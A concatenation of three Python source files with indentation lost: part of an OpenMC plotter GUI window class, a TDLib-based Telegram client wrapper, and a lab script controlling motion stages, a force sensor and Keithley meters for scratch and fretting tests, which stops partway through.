def editTallyDataMax(self, value, apply=False):
av = self.model.activeView
av.tallyDataMax = value
if apply:
self.applyChanges()
def editTallyDataColormap(self, cmap, apply=False):
av = self.model.activeView
av.tallyDataColormap = cmap
if apply:
self.applyChanges()
def updateTallyMinMax(self):
self.tallyDock.updateMinMax()
# Plot image methods
def editPlotOrigin(self, xOr, yOr, zOr=None, apply=False):
if zOr is not None:
self.model.activeView.origin = [xOr, yOr, zOr]
else:
origin = [None, None, None]
origin[self.xBasis] = xOr
origin[self.yBasis] = yOr
origin[self.zBasis] = self.model.activeView.origin[self.zBasis]
self.model.activeView.origin = origin
self.dock.updateOrigin()
if apply:
self.applyChanges()
def revertDockControls(self):
self.dock.revertToCurrent()
def editDomainColor(self, kind, id):
if kind == 'Cell':
domain = self.model.activeView.cells
else:
domain = self.model.activeView.materials
current_color = domain[id].color
dlg = QColorDialog(self)
if isinstance(current_color, tuple):
dlg.setCurrentColor(QtGui.QColor.fromRgb(*current_color))
elif isinstance(current_color, str):
current_color = openmc.plots._SVG_COLORS[current_color]
dlg.setCurrentColor(QtGui.QColor.fromRgb(*current_color))
if dlg.exec_():
new_color = dlg.currentColor().getRgb()[:3]
domain[id].color = new_color
self.applyChanges()
def toggleDomainMask(self, state, kind, id):
if kind == 'Cell':
domain = self.model.activeView.cells
else:
domain = self.model.activeView.materials
domain[id].masked = bool(state)
self.applyChanges()
def toggleDomainHighlight(self, state, kind, id):
if kind == 'Cell':
domain = self.model.activeView.cells
else:
domain = self.model.activeView.materials
domain[id].highlight = bool(state)
self.applyChanges()
# Helper methods:
def restoreWindowSettings(self):
settings = QtCore.QSettings()
self.resize(settings.value("mainWindow/Size",
QtCore.QSize(800, 600)))
self.move(settings.value("mainWindow/Position",
QtCore.QPoint(100, 100)))
self.restoreState(settings.value("mainWindow/State"))
self.colorDialog.resize(settings.value("colorDialog/Size",
QtCore.QSize(400, 500)))
self.colorDialog.move(settings.value("colorDialog/Position",
QtCore.QPoint(600, 200)))
is_visible = settings.value("colorDialog/Visible", 0)
# some versions of PySide will return None rather than the default value
if is_visible is None:
is_visible = False
else:
is_visible = bool(int(is_visible))
self.colorDialog.setVisible(is_visible)
def restoreModelSettings(self):
if os.path.isfile("plot_settings.pkl"):
with open('plot_settings.pkl', 'rb') as file:
model = pickle.load(file)
# do not replace model if the version is out of date
if model.version != self.model.version:
print("WARNING: previous plot settings are for a different "
"version of the GUI. They will be ignored.")
wrn_msg = "Existing version: {}, Current GUI version: {}"
print(wrn_msg.format(model.version, self.model.version))
return
try:
self.model.statepoint = model.statepoint
except OSError:
msg_box = QMessageBox()
msg = "Could not open statepoint file: \n\n {} \n"
msg_box.setText(msg.format(self.model.statepoint.filename))
msg_box.setIcon(QMessageBox.Warning)
msg_box.setStandardButtons(QMessageBox.Ok)
msg_box.exec_()
self.model.statepoint = None
self.model.currentView = model.currentView
self.model.activeView = copy.deepcopy(model.currentView)
self.model.previousViews = model.previousViews
self.model.subsequentViews = model.subsequentViews
def resetModels(self):
self.cellsModel = DomainTableModel(self.model.activeView.cells)
self.materialsModel = DomainTableModel(self.model.activeView.materials)
self.cellsModel.beginResetModel()
self.cellsModel.endResetModel()
self.materialsModel.beginResetModel()
self.materialsModel.endResetModel()
self.colorDialog.updateDomainTabs()
def showCurrentView(self):
self.updateScale()
self.updateRelativeBases()
self.plotIm.updatePixmap()
if self.model.previousViews:
self.undoAction.setDisabled(False)
if self.model.subsequentViews:
self.redoAction.setDisabled(False)
else:
self.redoAction.setDisabled(True)
self.adjustWindow()
def updateScale(self):
cv = self.model.currentView
self.scale = (cv.h_res / cv.width,
cv.v_res / cv.height)
def updateRelativeBases(self):
cv = self.model.currentView
self.xBasis = 0 if cv.basis[0] == 'x' else 1
self.yBasis = 1 if cv.basis[1] == 'y' else 2
self.zBasis = 3 - (self.xBasis + self.yBasis)
def adjustWindow(self):
self.setMaximumSize(self.screen.width(), self.screen.height())
def onRatioChange(self):
av = self.model.activeView
if av.aspectLock:
ratio = av.width / max(av.height, .001)
av.v_res = int(av.h_res / ratio)
self.dock.updateVRes()
def showCoords(self, xPlotPos, yPlotPos):
cv = self.model.currentView
if cv.basis == 'xy':
coords = ("({}, {}, {})".format(round(xPlotPos, 2),
round(yPlotPos, 2),
round(cv.origin[2], 2)))
elif cv.basis == 'xz':
coords = ("({}, {}, {})".format(round(xPlotPos, 2),
round(cv.origin[1], 2),
round(yPlotPos, 2)))
else:
coords = ("({}, {}, {})".format(round(cv.origin[0], 2),
round(xPlotPos, 2),
round(yPlotPos, 2)))
self.coord_label.setText('{}'.format(coords))
def resizePixmap(self):
self.plotIm._resize()
self.plotIm.adjustSize()
def moveEvent(self, event):
self.adjustWindow()
def resizeEvent(self, event):
self.plotIm._resize()
self.adjustWindow()
self.updateScale()
if self.shortcutOverlay.isVisible():
self.shortcutOverlay.resize(self.width(), self.height())
def closeEvent(self, event):
settings = QtCore.QSettings()
settings.setValue("mainWindow/Size", self.size())
settings.setValue("mainWindow/Position", self.pos())
settings.setValue("mainWindow/State", self.saveState())
settings.setValue("colorDialog/Size", self.colorDialog.size())
settings.setValue("colorDialog/Position", self.colorDialog.pos())
visible = int(self.colorDialog.isVisible())
settings.setValue("colorDialog/Visible", visible)
openmc.lib.finalize()
self.saveSettings()
def saveSettings(self):
if len(self.model.previousViews) > 10:
self.model.previousViews = self.model.previousViews[-10:]
if len(self.model.subsequentViews) > 10:
self.model.subsequentViews = self.model.subsequentViews[-10:]
with open('plot_settings.pkl', 'wb') as file:
if self.model.statepoint:
self.model.statepoint.close()
pickle.dump(self.model, file)
def exportTallyData(self):
# show export tool dialog
self.showExportDialog()
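# --- Launch sketch (added for illustration; not part of the original module) ---
# The plotter normally starts through its own entry point; this only outlines
# how MainWindow is wired up, assuming an OpenMC model (geometry.xml,
# materials.xml, settings.xml) sits in the working directory and that model
# initialization is handled as in normal use.
def _example_launch():
    import sys
    app = QApplication(sys.argv)
    font_metric = QtGui.QFontMetrics(app.font())
    screen_size = app.primaryScreen().size()
    window = MainWindow(font_metric, screen_size)
    window.loadGui()
    window.show()
    sys.exit(app.exec_())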
|
client.py
|
import os
import hashlib
import time
import queue
import signal
import typing
import getpass
import logging
import base64
import threading
from typing import (
Any,
Dict,
List,
Type,
Callable,
Optional,
DefaultDict,
Union,
Tuple,
)
from types import FrameType
from collections import defaultdict
import enum
from telegram import VERSION
from telegram.utils import AsyncResult
from telegram.tdjson import TDJson
from telegram.worker import BaseWorker, SimpleWorker
logger = logging.getLogger(__name__)
MESSAGE_HANDLER_TYPE: str = 'updateNewMessage'
class AuthorizationState(enum.Enum):
NONE = None
WAIT_CODE = 'authorizationStateWaitCode'
WAIT_PASSWORD = 'authorizationStateWaitPassword'
WAIT_TDLIB_PARAMETERS = 'authorizationStateWaitTdlibParameters'
WAIT_ENCRYPTION_KEY = 'authorizationStateWaitEncryptionKey'
WAIT_PHONE_NUMBER = 'authorizationStateWaitPhoneNumber'
READY = 'authorizationStateReady'
CLOSING = 'authorizationStateClosing'
CLOSED = 'authorizationStateClosed'
class Telegram:
def __init__(
self,
api_id: int,
api_hash: str,
database_encryption_key: Union[str, bytes],
phone: Optional[str] = None,
bot_token: Optional[str] = None,
library_path: Optional[str] = None,
worker: Optional[Type[BaseWorker]] = None,
files_directory: Optional[str] = None,
use_test_dc: bool = False,
use_message_database: bool = True,
device_model: str = 'python-telegram',
application_version: str = VERSION,
system_version: str = 'unknown',
system_language_code: str = 'en',
login: bool = False,
default_workers_queue_size: int = 1000,
tdlib_verbosity: int = 2,
proxy_server: str = '',
proxy_port: int = 0,
proxy_type: Optional[Dict[str, str]] = None,
use_secret_chats: bool = True,
) -> None:
"""
Args:
api_id - ID of your app (https://my.telegram.org/apps/)
api_hash - api_hash of your app (https://my.telegram.org/apps/)
phone - your phone number
library_path - you can change path to the compiled libtdjson library
worker - worker to process updates
files_directory - directory for the tdlib's files (database, images, etc.)
use_test_dc - use test datacenter
use_message_database
use_secret_chats
device_model
application_version
system_version
system_language_code
"""
self.api_id = api_id
self.api_hash = api_hash
self.library_path = library_path
self.phone = phone
self.bot_token = bot_token
self.use_test_dc = use_test_dc
self.device_model = device_model
self.system_version = system_version
self.system_language_code = system_language_code
self.application_version = application_version
self.use_message_database = use_message_database
self._queue_put_timeout = 10
self.proxy_server = proxy_server
self.proxy_port = proxy_port
self.proxy_type = proxy_type
self.use_secret_chats = use_secret_chats
self.authorization_state = AuthorizationState.NONE
if not self.bot_token and not self.phone:
raise ValueError('You must provide bot_token or phone')
self._database_encryption_key = database_encryption_key
if not files_directory:
hasher = hashlib.md5()
str_to_encode: str = self.phone or self.bot_token # type: ignore
hasher.update(str_to_encode.encode('utf-8'))
directory_name = hasher.hexdigest()
files_directory = f'/tmp/.tdlib_files/{directory_name}/'
self.files_directory = files_directory
self._authorized = False
self._stopped = threading.Event()
# todo: move to worker
self._workers_queue: queue.Queue = queue.Queue(maxsize=default_workers_queue_size)
if not worker:
worker = SimpleWorker
self.worker: BaseWorker = worker(queue=self._workers_queue)
self._results: Dict[str, AsyncResult] = {}
self._update_handlers: DefaultDict[str, List[Callable]] = defaultdict(list)
self._tdjson = TDJson(library_path=library_path, verbosity=tdlib_verbosity)
self._run()
if login:
self.login()
def stop(self) -> None:
"""Stops the client"""
if self._stopped.is_set():
return
logger.info('Stopping telegram client...')
self._close()
self.worker.stop()
self._stopped.set()
# wait for the tdjson listener to stop
self._td_listener.join()
if hasattr(self, '_tdjson'):
self._tdjson.stop()
def _close(self) -> None:
"""
Calls the tdlib `close` method and waits until authorization_state becomes CLOSED.
Blocking.
"""
self.call_method('close')
while self.authorization_state != AuthorizationState.CLOSED:
result = self.get_authorization_state()
self.authorization_state = self._wait_authorization_result(result)
logger.info('Authorization state: %s', self.authorization_state)
time.sleep(0.5)
def send_message(self, chat_id: int, text: str) -> AsyncResult:
"""
Sends a message to a chat. The chat must be in tdlib's database.
If the chat is not in the database, tdlib returns an error.
A chat is saved to the database when the client receives a message or when you call the `get_chats` method.
Args:
chat_id
text
Returns:
AsyncResult
The update will be:
{
'@type': 'message',
'id': 1,
'sender_user_id': 2,
'chat_id': 3,
...
}
"""
data = {
'@type': 'sendMessage',
'chat_id': chat_id,
'input_message_content': {
'@type': 'inputMessageText',
'text': {'@type': 'formattedText', 'text': text},
},
}
return self._send_data(data)
def get_chat(self, chat_id: int) -> AsyncResult:
"""
This is an offline request; if the chat is not in your database, it will not be found.
tdlib saves a chat to the database when it receives a new message or when you call the `get_chats` method.
"""
data = {'@type': 'getChat', 'chat_id': chat_id}
return self._send_data(data)
def get_me(self) -> AsyncResult:
"""
Requests information of the current user (getMe method)
https://core.telegram.org/tdlib/docs/classtd_1_1td__api_1_1get_me.html
"""
return self.call_method('getMe')
def get_user(self, user_id: int) -> AsyncResult:
"""
Requests information about a user with id = user_id.
https://core.telegram.org/tdlib/docs/classtd_1_1td__api_1_1get_user.html
"""
return self.call_method('getUser', params={'user_id': user_id})
def get_chats(self, offset_order: int = 0, offset_chat_id: int = 0, limit: int = 100) -> AsyncResult:
"""
Returns a list of chats:
Returns:
{
'@type': 'chats',
'chat_ids': [...],
'@extra': {
'request_id': '...'
}
}
"""
data = {
'@type': 'getChats',
'offset_order': offset_order,
'offset_chat_id': offset_chat_id,
'limit': limit,
}
return self._send_data(data)
def get_chat_history(
self,
chat_id: int,
limit: int = 1000,
from_message_id: int = 0,
offset: int = 0,
only_local: bool = False,
) -> AsyncResult:
"""
Returns history of a chat
Args:
chat_id
limit
from_message_id
offset
only_local
"""
data = {
'@type': 'getChatHistory',
'chat_id': chat_id,
'limit': limit,
'from_message_id': from_message_id,
'offset': offset,
'only_local': only_local,
}
return self._send_data(data)
def get_message(
self,
chat_id: int,
message_id: int,
) -> AsyncResult:
"""
Return a message via its message_id
Args:
chat_id
message_id
Returns:
AsyncResult
The update will be:
{
'@type': 'message',
'id': 1,
'sender_user_id': 2,
'chat_id': 3,
'content': {...},
...
}
"""
data = {
'@type': 'getMessage',
'chat_id': chat_id,
'message_id': message_id,
}
return self._send_data(data)
def delete_messages(self, chat_id: int, message_ids: List[int], revoke: bool = True) -> AsyncResult:
"""
Delete a list of messages in a chat
Args:
chat_id
message_ids
revoke
"""
return self._send_data(
{
'@type': 'deleteMessages',
'chat_id': chat_id,
'message_ids': message_ids,
'revoke': revoke,
}
)
def get_supergroup_full_info(self, supergroup_id: int) -> AsyncResult:
"""
Get the full info of a supergroup
Args:
supergroup_id
"""
return self._send_data({'@type': 'getSupergroupFullInfo', 'supergroup_id': supergroup_id})
def create_basic_group_chat(self, basic_group_id: int) -> AsyncResult:
"""
Create a chat from a basic group
Args:
basic_group_id
"""
return self._send_data({'@type': 'createBasicGroupChat', 'basic_group_id': basic_group_id})
def get_web_page_instant_view(self, url: str, force_full: bool = False) -> AsyncResult:
"""
Use this method to request an instant preview of a webpage.
Returns a 404 error if there is no preview for this webpage.
Args:
url: URL of a webpage
force_full: If true, the full instant view for the web page will be returned
"""
data = {'@type': 'getWebPageInstantView', 'url': url, 'force_full': force_full}
return self._send_data(data)
def call_method(
self,
method_name: str,
params: Optional[Dict[str, Any]] = None,
block: bool = False,
) -> AsyncResult:
"""
Use this method to call any other method of the tdlib
Args:
method_name: Name of the method
params: parameters
"""
data = {'@type': method_name}
if params:
data.update(params)
return self._send_data(data, block=block)
def _run(self) -> None:
self._td_listener = threading.Thread(target=self._listen_to_td)
self._td_listener.daemon = True
self._td_listener.start()
self.worker.run()
def _listen_to_td(self) -> None:
logger.info('[Telegram.td_listener] started')
while not self._stopped.is_set():
update = self._tdjson.receive()
if update:
self._update_async_result(update)
self._run_handlers(update)
def _update_async_result(self, update: Dict[Any, Any]) -> typing.Optional[AsyncResult]:
async_result = None
_special_types = ('updateAuthorizationState',) # for authorizationProcess @extra.request_id doesn't work
if update.get('@type') in _special_types:
request_id = update['@type']
else:
request_id = update.get('@extra', {}).get('request_id')
if not request_id:
logger.debug('request_id has not been found in the update')
else:
async_result = self._results.get(request_id)
if not async_result:
logger.debug('async_result has not been found by request_id=%s', request_id)
else:
done = async_result.parse_update(update)
if done:
self._results.pop(request_id, None)
return async_result
def _run_handlers(self, update: Dict[Any, Any]) -> None:
update_type: str = update.get('@type', 'unknown')
for handler in self._update_handlers[update_type]:
self._workers_queue.put((handler, update), timeout=self._queue_put_timeout)
def remove_update_handler(self, handler_type: str, func: Callable) -> None:
"""
Remove a handler with the specified type
"""
try:
self._update_handlers[handler_type].remove(func)
except (ValueError, KeyError):
# not in the list
pass
def add_message_handler(self, func: Callable) -> None:
self.add_update_handler(MESSAGE_HANDLER_TYPE, func)
def add_update_handler(self, handler_type: str, func: Callable) -> None:
if func not in self._update_handlers[handler_type]:
self._update_handlers[handler_type].append(func)
def _send_data(
self,
data: Dict[Any, Any],
result_id: Optional[str] = None,
block: bool = False,
) -> AsyncResult:
"""
Sends data to tdlib.
If `block` is True, waits for the result
"""
if '@extra' not in data:
data['@extra'] = {}
if not result_id and 'request_id' in data['@extra']:
result_id = data['@extra']['request_id']
async_result = AsyncResult(client=self, result_id=result_id)
data['@extra']['request_id'] = async_result.id
self._results[async_result.id] = async_result
self._tdjson.send(data)
async_result.request = data
if block:
async_result.wait(raise_exc=True)
return async_result
def idle(
self,
stop_signals: Tuple = (
signal.SIGINT,
signal.SIGTERM,
signal.SIGABRT,
signal.SIGQUIT,
),
) -> None:
"""
Blocks until one of the exit signals is received.
When a signal is received, calls `stop`.
"""
for sig in stop_signals:
signal.signal(sig, self._stop_signal_handler)
self._stopped.wait()
def _stop_signal_handler(self, signum: int, frame: FrameType) -> None:
logger.info('Signal %s received!', signum)
self.stop()
def get_authorization_state(self) -> AsyncResult:
logger.debug('Getting authorization state')
data = {'@type': 'getAuthorizationState'}
return self._send_data(data, result_id='getAuthorizationState')
def _wait_authorization_result(self, result: AsyncResult) -> AuthorizationState:
authorization_state = None
if result:
result.wait(raise_exc=True)
if result.update is None:
raise RuntimeError('Something went wrong: the result update is None')
if result.id == 'getAuthorizationState':
authorization_state = result.update['@type']
else:
authorization_state = result.update['authorization_state']['@type']
return AuthorizationState(authorization_state)
def login(self, blocking: bool = True) -> AuthorizationState:
"""
Login process.
Must be called before any other call.
It sends the initial params to tdlib, sets the database encryption key, etc.
Args:
blocking [bool]: If True, the process is blocking and the client
expects the code and password from stdin.
If False, `login` returns the next AuthorizationState and
the login process can be continued (by calling login(blocking=False) again)
after the necessary action is completed.
Returns:
- AuthorizationState.WAIT_CODE if a Telegram code is required.
The caller should ask the end user for the Telegram code
and then call send_code(code)
- AuthorizationState.WAIT_PASSWORD if a Telegram password is required.
The caller should ask the end user for the Telegram password
and then call send_password(password)
- AuthorizationState.READY if the login process succeeded.
"""
if self.proxy_server:
self._send_add_proxy()
actions: Dict[AuthorizationState, Callable[[], AsyncResult]] = {
AuthorizationState.NONE: self.get_authorization_state,
AuthorizationState.WAIT_TDLIB_PARAMETERS: self._set_initial_params,
AuthorizationState.WAIT_ENCRYPTION_KEY: self._send_encryption_key,
AuthorizationState.WAIT_PHONE_NUMBER: self._send_phone_number_or_bot_token,
AuthorizationState.WAIT_CODE: self._send_telegram_code,
AuthorizationState.WAIT_PASSWORD: self._send_password,
}
blocking_actions = (
AuthorizationState.WAIT_CODE,
AuthorizationState.WAIT_PASSWORD,
)
if self.phone:
logger.info('[login] Login process has been started with phone')
else:
logger.info('[login] Login process has been started with bot token')
while self.authorization_state != AuthorizationState.READY:
logger.info('[login] current authorization state: %s', self.authorization_state)
if not blocking and self.authorization_state in blocking_actions:
return self.authorization_state
result = actions[self.authorization_state]()
if not isinstance(result, AuthorizationState):
self.authorization_state = self._wait_authorization_result(result)
else:
self.authorization_state = result
return self.authorization_state
def _set_initial_params(self) -> AsyncResult:
logger.info(
'Setting tdlib initial params: files_dir=%s, test_dc=%s',
self.files_directory,
self.use_test_dc,
)
data = {
# todo: params
'@type': 'setTdlibParameters',
'parameters': {
'use_test_dc': self.use_test_dc,
'api_id': self.api_id,
'api_hash': self.api_hash,
'device_model': self.device_model,
'system_version': self.system_version,
'application_version': self.application_version,
'system_language_code': self.system_language_code,
'database_directory': os.path.join(self.files_directory, 'database'),
'use_message_database': self.use_message_database,
'files_directory': os.path.join(self.files_directory, 'files'),
'use_secret_chats': self.use_secret_chats,
},
}
return self._send_data(data, result_id='updateAuthorizationState')
def _send_encryption_key(self) -> AsyncResult:
logger.info('Sending encryption key')
key = self._database_encryption_key
if isinstance(key, str):
key = key.encode()
data = {
'@type': 'checkDatabaseEncryptionKey',
'encryption_key': base64.b64encode(key).decode(),
}
return self._send_data(data, result_id='updateAuthorizationState')
def _send_phone_number_or_bot_token(self) -> AsyncResult:
"""Sends phone number or a bot_token"""
if self.phone:
return self._send_phone_number()
elif self.bot_token:
return self._send_bot_token()
else:
raise RuntimeError('Unknown mode: both bot_token and phone are None')
def _send_phone_number(self) -> AsyncResult:
logger.info('Sending phone number')
data = {
'@type': 'setAuthenticationPhoneNumber',
'phone_number': self.phone,
'allow_flash_call': False,
'is_current_phone_number': True,
}
return self._send_data(data, result_id='updateAuthorizationState')
def _send_add_proxy(self) -> AsyncResult:
logger.info('Sending addProxy')
data = {
'@type': 'addProxy',
'server': self.proxy_server,
'port': self.proxy_port,
'enable': True,
'type': self.proxy_type,
}
return self._send_data(data, result_id='setProxy')
def _send_bot_token(self) -> AsyncResult:
logger.info('Sending bot token')
data = {'@type': 'checkAuthenticationBotToken', 'token': self.bot_token}
return self._send_data(data, result_id='updateAuthorizationState')
def _send_telegram_code(self, code: Optional[str] = None) -> AsyncResult:
logger.info('Sending code')
if code is None:
code = input('Enter code:')
data = {'@type': 'checkAuthenticationCode', 'code': str(code)}
return self._send_data(data, result_id='updateAuthorizationState')
def send_code(self, code: str) -> AuthorizationState:
"""
Verifies a Telegram code and continues the authorization process
Args:
code: the code to be verified. If code is None, the user is prompted for it via input()
Returns:
- AuthorizationState. The caller has to call `login` to continue the login process.
Raises:
- RuntimeError if the login failed
"""
result = self._send_telegram_code(code)
self.authorization_state = self._wait_authorization_result(result)
return self.authorization_state
def _send_password(self, password: Optional[str] = None) -> AsyncResult:
logger.info('Sending password')
if password is None:
password = getpass.getpass('Password:')
data = {'@type': 'checkAuthenticationPassword', 'password': password}
return self._send_data(data, result_id='updateAuthorizationState')
def send_password(self, password: str) -> AuthorizationState:
"""
Verifies a Telegram password and continues the authorization process
Args:
password: the password to be verified.
If password is None, the user is prompted for it via getpass.getpass()
Returns:
- AuthorizationState. The caller has to call `login` to continue the login process.
Raises:
- RuntimeError if the login failed
"""
result = self._send_password(password)
self.authorization_state = self._wait_authorization_result(result)
return self.authorization_state
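# Hedged usage sketch (not part of the original client): the docstrings above say
# that send_code()/send_password() return an AuthorizationState and that the caller
# must call login() again to continue. A manual flow could look like the helper
# below; the enum member names WAIT_CODE and WAIT_PASSWORD are assumptions for
# illustration, not taken from this file.
def _example_interactive_login(client):
    state = client.login()
    if getattr(state, 'name', '') == 'WAIT_CODE':
        state = client.send_code(input('Enter code: '))
    if getattr(state, 'name', '') == 'WAIT_PASSWORD':
        client.send_password(getpass.getpass('Password: '))
    return client.login()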
|
scratch_fretting.py
|
"""
Date 01.2021
@author: Chair of Functional Materials - Saarland University - Saarbrücken, Bruno Alderete
@version 1.0
"""
__author__ = 'Bruno Alderete'
#######################################################################################################################
#
# The MIT License (MIT)
#
# Copyright (c) 2021 Bruno Alderete
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
#######################################################################################################################
#########################################################################
########################################################
########################################################
############# SCRATCH AND FRETTING TEST ###############
########################################################
########################################################
#########################################################################
from gsv8 import gsv8 # import for force sensor
from GSV_BasicMeasurement import BasicMeasurement # import for force Sensor
from pipython import GCSDevice, pitools # import for stages
import time # import for time
from datetime import datetime, timedelta
import threading
import pandas as pd
import pyvisa
########################
##### INSTRUMENTS #####
########################
### STAGES ###
STAGES = ('L-511.20SD00', 'L-511.20SD00')
REFMODE = ('FNL') # Fast reference move to negative limit
motorZ = GCSDevice('C-663.12')
motorX = GCSDevice('C-663.12')
### FORCE SENSOR ###
force_sensor = gsv8("COM16", 115200)
### PIEZO ###
piezo = GCSDevice(devname='E-709.CHG')
### ELECTRICAL EQUIPMENT ###
rm = pyvisa.ResourceManager('@py')
k2400 = rm.open_resource('GPIB::24::INSTR')
k2182 = rm.open_resource('GPIB::7::INSTR')
###############################
##### VARIABLES AND LISTS #####
###############################
is_done = False
### ELECTRIC PARAMETERS ###
i_meas_list = []
v_meas_list = []
resistance = []
current = 100E-3 # 100 mA
sleep_time = 1
### FORCE ACQUISITION ###
force_x = []
force_z = []
cof = []
### FRETTING ###
amp = []
freq = []
dur = []
dur_time = []
### RESULTS ###
df_results = pd.DataFrame(columns=['Force X-Axis', 'Force Z-Axis', 'CoF'])
df_fretting = pd.DataFrame(columns=['Amplitude', 'Frequency', 'Cycles', 'Fretting duration'])
df_electric = pd.DataFrame(columns=['Current', 'Voltage', 'Resistance'])
df_all_values = pd.DataFrame(columns=['Force X-Axis', 'Force Z-Axis', 'CoF', 'Amplitude', 'Frequency', 'Cycles', 'Fretting duration', 'Current', 'Voltage', 'Resistance'])
###############################
##### FUNCTION DEFINITION #####
###############################
### TAKE FORCE ALL AXIS ###
def take_force_all():
measurement0 = force_sensor.ReadValue()
x_load0 = "%.4f" % float('{}'.format(measurement0.getChannel1()))
y_load0 = "%.4f" % float('{}'.format(measurement0.getChannel2()))
z_load0 = "%.4f" % float('{}'.format(measurement0.getChannel3()))
print('X load is: ', x_load0, ' N')
print('Y load is: ', y_load0, ' N')
print('Z load is: ', z_load0, ' N')
### TAKE NORMAL LOAD ONLY ###
def take_force_normal():
measurementZ = force_sensor.ReadValue()
z_load = "%.4f" % float('{}'.format(measurementZ.getChannel3()))
print('Z load is ', z_load, ' N')
return z_load
### START, REFERENCE AND MOVE STAGES TO CENTER POSITION ###
def start_stages(targetZ=10,targetX=26,vel_Z=15,vel_X=15,wait=5):
motorZ.OpenUSBDaisyChain(description='019550102')
daisychainid = motorZ.dcid
motorZ.ConnectDaisyChainDevice(1, daisychainid)
motorX.ConnectDaisyChainDevice(2, daisychainid)
pitools.startup(motorZ, stages=STAGES, refmode=REFMODE)
print('Z-axis current position: ', float(str(motorZ.qPOS(motorZ.axes))[18:-3]))
pitools.startup(motorX, stages=STAGES, refmode=REFMODE)
print('X-axis current position: ', float(str(motorX.qPOS(motorX.axes))[18:-3]))
time.sleep(wait)
motorX.VEL(motorX.axes, vel_X)
motorX.MOV(motorX.axes, targetX)
pitools.waitontarget(motorX)
print('Position X: ',float(str(motorX.qPOS(motorX.axes))[18:-3]))
motorZ.VEL(motorZ.axes, vel_Z)
motorZ.MOV(motorZ.axes, targetZ)
pitools.waitontarget(motorZ)
print('Position Z: ',float(str(motorZ.qPOS(motorZ.axes))[18:-3]))
time.sleep(wait)
### START ELECTRIC INSTRUMENTS ###
def start_instr(curr_app='100E-3',curr_prot='150E-3'):
# Start and reset Keithley 2400
k2400.write('*RST')
k2400.timeout = 60000 # 60 seconds timeout
k2400.write(':ROUT:TERM REAR')
k2400.write(':SENS:FUNC:CONC OFF')
k2400.write(':SOUR:FUNC CURR')
k2400.write(f':SOUR:CURR {curr_app}') # Applied current in A
k2400.write(":SENS:FUNC 'CURR:DC'")
k2400.write(f':SENS:CURR:PROT {curr_prot}')
# Start and reset Keithley 2182
k2182.write('*RST')
### TAKE i MEASUREMENT ###
def take_i_meas(sour_del=1):
k2400.write('TRIG:COUN 1') # Amount of measurements
k2400.write(f'SOUR:DEL {sour_del}') # Delay in seconds (between 0, 60). Time i is applied
k2400.write(':FORM:ELEM CURR')
k2400.write(':OUTP ON')
i_meas_list.append(k2400.query_ascii_values(':READ?'))
### TAKE V MEASUREMENT ###
def take_v_meas():
k2182.write('*RST')
k2182.write(":SENS:FUNC 'VOLT'")
k2182.write(':SENS:CHAN 1')
k2182.write(':SENS:VOLT:CHAN1:RANG 1') # k2182.write(':SENS:VOLT:CHAN1:RANG:AUTO ON')
v_meas_list.append(k2182.query_ascii_values(':READ?'))
### TAKE FULL MEASUREMENT ###
def take_measurement(meas=5, trigs=0, curr_app='100E-3', curr_prot='150E-3', sour_del=1, sleep_time=1):
start_instr(curr_app, curr_prot)
while trigs < meas:
take_i_meas(sour_del)
take_v_meas()
trigs += 1
k2400.write(':OUTP OFF') # turns off smu between measurements
### ECR ###
def ecr(meas=5):
trigs = 0 # set counter to zero
while trigs < meas:
if trigs % 2 == 0:
take_measurement(meas=1, trigs=0, curr_app=str(current), curr_prot='150E-3', sour_del=1)
time.sleep(sleep_time)
else:
take_measurement(meas=1, trigs=0, curr_app='-' + str(current), curr_prot='150E-3', sour_del=1)
time.sleep(sleep_time)
trigs += 1
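# Hedged post-processing sketch (not called by this script): alternating the current
# polarity in ecr() makes it possible to cancel thermoelectric offsets by averaging
# |V/I| over consecutive +/- readings. save_data() further down simply divides each
# voltage by its current instead; this helper only illustrates the alternative.
def delta_resistance(v_readings, i_readings):
    ratios = [abs(v / i) for v, i in zip(v_readings, i_readings) if i != 0]
    return sum(ratios) / len(ratios) if ratios else float('nan')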
### COARSE APPROACH X-AXIS ###
def approach_X_stage(approach_X=1):
print('Position X: ',float(str(motorX.qPOS(motorX.axes))[18:-3]))
while approach_X == 1:
print('\n##############################################################')
moveX = float(input('Enter how many mm the X-axis should move: '))
print('You chose to move: ', moveX, ' mm\n')
motorX.MVR(motorX.axes, moveX) # MVR moves relative, MOV moves absolute
pitools.waitontarget(motorX)
print('Position X: ',float(str(motorX.qPOS(motorX.axes))[18:-3]))
approach_X = int(input('Do you want to keep moving the X stage? (enter 1 to continue approaching, enter 0 if you DO NOT want to continue approaching): '))
if approach_X == 1:
print('You chose to continue approaching the X stage.\n') # MAKE SURE YOU INPUT CORRECTLY
else:
print('You are done approaching the X stage.\n')
### COARSE APPROACH Z-AXIS ###
def approach_Z_stage(approach_Z=1):
print('Position Z: ',float(str(motorZ.qPOS(motorZ.axes))[18:-3]))
while approach_Z == 1:
print('\n##############################################################')
moveZ = float(input('Enter how many mm the Z-axis should move: '))
print('You chose to move: ', moveZ, ' mm\n')
motorZ.MVR(motorZ.axes, moveZ)
pitools.waitontarget(motorZ)
print('Position Z: ',float(str(motorZ.qPOS(motorZ.axes))[18:-3]))
approach_Z = int(input('Do you want to keep moving the Z stage? (enter 1 to continue approaching, enter 0 if you DO NOT want to continue approaching): '))
if approach_Z == 1 :
print('You chose to continue approaching the Z stage.\n') # MAKE SURE YOU INPUT CORRECTLY
else:
print('You are done approaching the Z stage.\n')
start_stages()
approach_X_stage()
approach_Z_stage()
approach_X_stage()
#############################
###### PARAMETER INPUT ######
#############################
### SCRATCH ###
print('\n##############################################################')
print('In the following commands please input the parameters for the scratch test.')
